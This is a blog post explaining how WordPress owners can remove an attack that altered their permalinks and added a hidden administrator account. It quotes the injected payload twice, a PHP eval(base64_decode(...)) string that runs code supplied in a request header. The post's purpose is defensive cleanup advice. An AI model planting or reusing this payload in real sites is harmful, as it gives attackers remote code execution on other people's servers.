Blogging, Wordpress

UPDATED! Breaking: WordPress MySQL injection – how to fix latest attack %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

Update 2013:

This post is way old, but people using WordPress still get hacked constantly, so this post we put together may be of some help if you are having problems with wordpress security!

6 Simple Steps To Better WordPress Security

Hey Guys,

Just realized that a lot of people were hit with this latest WordPress Blog Attack – Its a MySQL Injection that screws up your permalinks and in turn makes you blog post links not work! So I figured i’d write up this quick post to help some people out!

It appears that yesterday, many wordpress blogs got hit with this nasty hack that appended a
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

Or a
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

to your permalinks which rendered your blog post links useless unless someone physically removed the infected string of code from the URL

To fix things:

  • go to Setting->Permalinks and delete the above mean code

  • go to users, you will notice there are more administrators than usual

  • Put your mouse over the users and find the one that is last to register

  • Right click and copy the edit url, then paste it into the address bar. Also increase the number by 1.

  • You should find the hidden admin with a weird code as a first name. Delete the code and make him a subscriber then return to users and delete him.
    This should fix it. Don’t forget to upgrade your blog to the latest version.

Hope this helps everyone! You can also delete the hidden user from PHPMyAdmin directly from the database, whatever you are comfortable with.

UPDATE: Mashable has written about this issue here.

NEWEST UPDATE: WordPress Responds to Attacks

NEWEST UPDATE: OFFICIAL RESPONSE FROM WORDPRESS

Here are some other good posts on the topic and have other examples that may be more specific to your issue:

http://www.warriorforum.com/main-internet-marketing-discussion-forum/121131-wordpress-mysql-injection-latest-attack-eval-base64_decode-_server-http_referer.html

http://www.netpassiveincome.com/wordpress-mysql-injection-permalink/

http://www.journeyetc.com/2009/09/04/wordpress-permalink-rss-problems/

You Might Also Like

Pin It on Pinterest

Shares
Share This

Powered by themekiller.com